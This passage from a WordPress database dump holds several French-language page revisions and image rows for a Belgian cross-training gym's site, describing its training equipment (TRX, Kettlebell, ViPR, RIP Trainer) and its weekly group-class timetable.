Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>RIP Trainer</h1>Le Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:03:08', '2013-06-16 11:03:08', '', 22, 'http://www.crosstrainingcenter.be/?p=67', 0, 'revision', '', 0),
(68, 1, '2013-06-16 11:10:26', '2013-06-16 11:10:26', '', 'trx1', '', 'inherit', 'open', 'open', '', 'trx1', '', '', '2013-06-16 11:10:26', '2013-06-16 11:10:26', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg', 0, 'attachment', 'image/jpeg', 0),
(69, 1, '2013-06-16 11:03:19', '2013-06-16 11:03:19', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:03:19', '2013-06-16 11:03:19', '', 22, 'http://www.crosstrainingcenter.be/?p=69', 0, 'revision', '', 0),
(70, 1, '2013-06-16 11:13:51', '2013-06-16 11:13:51', '', 'kb', '', 'inherit', 'open', 'open', '', 'kb', '', '', '2013-06-16 11:13:51', '2013-06-16 11:13:51', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg', 0, 'attachment', 'image/jpeg', 0),
(71, 1, '2013-06-16 11:10:48', '2013-06-16 11:10:48', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:10:48', '2013-06-16 11:10:48', '', 22, 'http://www.crosstrainingcenter.be/?p=71', 0, 'revision', '', 0),
(72, 1, '2013-06-16 11:19:12', '2013-06-16 11:19:12', '', 'vipr-f1', '', 'inherit', 'open', 'open', '', 'vipr-f1', '', '', '2013-06-16 11:19:12', '2013-06-16 11:19:12', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg', 0, 'attachment', 'image/jpeg', 0),
(73, 1, '2013-06-16 11:14:12', '2013-06-16 11:14:12', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:14:12', '2013-06-16 11:14:12', '', 22, 'http://www.crosstrainingcenter.be/?p=73', 0, 'revision', '', 0),
(74, 1, '2013-06-16 11:19:30', '2013-06-16 11:19:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:19:30', '2013-06-16 11:19:30', '', 22, 'http://www.crosstrainingcenter.be/?p=74', 0, 'revision', '', 0),
(75, 1, '2013-06-16 11:22:29', '2013-06-16 11:22:29', '', 'ript', '', 'inherit', 'open', 'open', '', 'ript', '', '', '2013-06-16 11:22:29', '2013-06-16 11:22:29', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg', 0, 'attachment', 'image/jpeg', 0),
(76, 1, '2013-06-16 11:22:21', '2013-06-16 11:22:21', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:22:21', '2013-06-16 11:22:21', '', 22, 'http://www.crosstrainingcenter.be/?p=76', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(284, 1, '2013-07-04 16:29:04', '2013-07-04 16:29:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre 